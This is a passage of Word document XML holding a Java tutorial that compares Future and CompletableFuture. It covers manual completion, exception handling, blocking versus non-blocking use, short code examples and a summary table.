    <w:p w14:paraId="3609CFA0"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uture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316F0FE2" w14:textId="77777777" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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not manually complete a Future. The task it represents is managed internally by a thread pool or an executor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC11404" w14:textId="77777777" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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provides the get() method to wait for the completion of the task, but it is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662998CB"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letableFuture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D79E8D" w14:textId="77777777" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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can </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>complete a CompletableFuture manually</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using the complete() method. This is useful for controlling when a task is marked as completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEA7C43" w14:textId="77777777" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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supports more advanced features like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>handling exceptions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and propagating them properly in the asynchronous chain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ADE58A" w14:textId="77777777" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506" w:rsidP="00DF350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Exception Handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4BB8BF"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uture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FB5A85" w14:textId="77777777" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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Future provides get() method, which throws </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>checked exceptions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like ExecutionException or InterruptedException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACC5FB4" w14:textId="77777777" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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ception handling is not as flexible as in CompletableFuture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D806FDA"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letableFuture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734FFAE0" w14:textId="77777777" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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letableFuture allows you to handle exceptions in a more flexible way through methods like exceptionally(), handle(), or whenComplete().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5846CE" w14:textId="77777777" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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 specify fallback logic if the task fails, without blocking the thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA1282C" w14:textId="77777777" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506" w:rsidP="00DF350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Blocking vs Non-blocking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708F09EE"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uture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7CE9AB" w14:textId="77777777" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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get() method is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: it will wait for the task to complete and then return the result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651D28D9"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letableFuture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB503F8" w14:textId="77777777" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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an be used in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ways, with methods like thenApply(), thenAccept() to perform computations asynchronously without blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D661396" w14:textId="77777777" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506" w:rsidP="00DF350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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500A612B" w14:textId="77777777" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506" w:rsidP="00DF350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uture Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69701C29"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ExecutorService</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> executo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xecuto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ewSingleThreadExecutor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF52DBC"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Future</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futur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xecut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ubmi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4E83ACC"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imulating long-running task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C24721C"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leep</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000</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3A7962"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23</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374F7CF1"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F79094E"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6166FAC8"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>try</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6AFB7D4"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Blocking call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2C0C71"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000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> resul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uture</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p>
    <w:p w14:paraId="5AE62F61"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Resul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esult</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB47E65"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atch</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Exception</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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661C095"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    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StackTrace</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D85F07F" w14:textId="69C69D92"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69C17C7C" w14:textId="77777777" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506" w:rsidP="00DF350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pletableFuture Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BC3361"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CompletableFuture</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completableFutur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ompletableFutur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upplyAsyn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F0BB5DA"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imulating long-running task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4C4D15"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y</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D35D83F"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leep</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000</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B5DCE1"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atch</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InterruptedException</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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CE75E1B"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        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StackTrace</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53121EC1"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932B025"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23</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289C7A12"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1603DD7B"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D548277"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>completableFuture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1DCD59"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henAppl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result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resul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haining another task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785B990F"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henAccep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result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rocessed Resul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esult</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0BCA75"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xceptionall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ex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862EE00"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Exception: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Message</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06516DD0" w14:textId="77777777"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p>
    <w:p w14:paraId="660F4BD1" w14:textId="6D90F14C" w:rsidR="00BD4E6E" w:rsidRPr="00CE4B95"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2239EAA" w14:textId="5D116E2A" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506" w:rsidP="00DF3506">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B8AD014" w14:textId="77777777" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506" w:rsidP="00DF350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7. Summary of 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0"/>
        <w:gridCol w:w="2465"/>
        <w:gridCol w:w="4728"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w14:paraId="795EC64E" w14:textId="77777777" w:rsidTr="00DF3506">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="675D4D74" w14:textId="77777777" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506" w:rsidP="00B11969">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01715235" w14:textId="77777777" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506" w:rsidP="00B11969">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uture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="736B606A" w14:textId="77777777" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506" w:rsidP="00B11969">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pletableFuture</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w14:paraId="446BDA51" w14:textId="77777777" w:rsidTr="00DF3506">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43EA9732"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locking vs Non-blocking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19B7328E"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locking (via get())</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="241B3FD0"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n-blocking (via methods like thenApply())</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w14:paraId="71333249" w14:textId="77777777" w:rsidTr="00DF3506">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78A32166"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anual Completion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25454D4D"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not manually complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EB35790"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be manually completed using complete()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w14:paraId="1941C029" w14:textId="77777777" w:rsidTr="00DF3506">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="541D07D7"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xception Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78C29D8A"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mited and blocking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D22C08D"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lexible, with methods like exceptionally()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w14:paraId="5DFAABDA" w14:textId="77777777" w:rsidTr="00DF3506">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A759DB2"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haining/Composition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D2F5D00"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chaining support</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D0FB0B3"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pports chaining of asynchronous tasks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w14:paraId="3AC603AF" w14:textId="77777777" w:rsidTr="00DF3506">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="749FA887"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age</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C11372F"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mple use cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B7ECE88"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lex asynchronous workflows with composition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="598826F7" w14:textId="77777777" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506" w:rsidP="00DF350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n to Use:</w:t>
      </w:r>
    </w:p>
